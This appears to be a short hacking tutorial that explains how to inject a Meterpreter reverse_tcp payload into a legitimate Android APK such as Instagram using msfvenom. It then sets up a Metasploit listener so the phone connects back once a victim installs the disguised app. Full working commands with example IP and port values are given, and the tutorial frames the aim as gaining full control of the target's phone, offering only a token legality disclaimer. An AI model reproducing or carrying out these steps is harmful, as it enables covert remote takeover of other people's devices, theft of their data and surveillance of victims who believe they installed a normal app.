Hack android by poisoning apps ๐ฑ
Add malware to original app (ex: Instagram, flappybird)
when user runs the app, it acts and works like a normal app, but in a nutshell we have full control over the target's phone ๐จโ๐ป
โDO NOT USE THIS FOR ILLEGAL STUFFโ
REQUIREMENTS
- A decent hacking linux distro ( ex: Kali, Parrot ) [ RECOMMENDED ]
- Or a system with MSFVENOM & METASPLOIT [ MUST ]
- Target and attacker must be on same network (at least both should communicate with IPV4) [ MUST ]
1. DOWNLOAD AN APK FILE
You need an APK file to poison, you could download or create it .
2. POISON THE APP
We are going to use MSFVENOM to poison ๐
# format
msfvenom -x <downloaded-apk-file> -p android/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=<ANY_PORT> -o payload.apk-x is to select the APK file, -p refer to payload that we gonna use.
# for my case
msfvenom -x app.apk -p android/meterpreter/reverse_tcp LHOST=192.168.11.3 LPORT=4444 -o payload.apkThis will generate a payload.apk in current folder
3. START LISTENER
We are using METASPLOIT for listener
Listener should be running before target use the app
Fire up METASPLOIT
$ msfconsoleuse exploit/multi/handler
msf6 > use exploit/multi/handler
fill up the options, you can see all options by typing show option
we need to set LHOST LPORT & PAYLOAD
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST <IP_USED_ON_PAYLOAD>
set LPORT <PORT_USED_ON_PAYLOAD>
run the exploit
run
Now listener will start, wait until victim install the app ๐จโ๐ป
4. DELIVER THE APP
You could use any delivering method to give app to target phone
[ I'm gonna skip this part because this is not our topic ]
When victim install the app, you should get a Meterpreter shell back CONGRATULATIONS, YOU HACKED IN TO AN ANDROID DEVICE ๐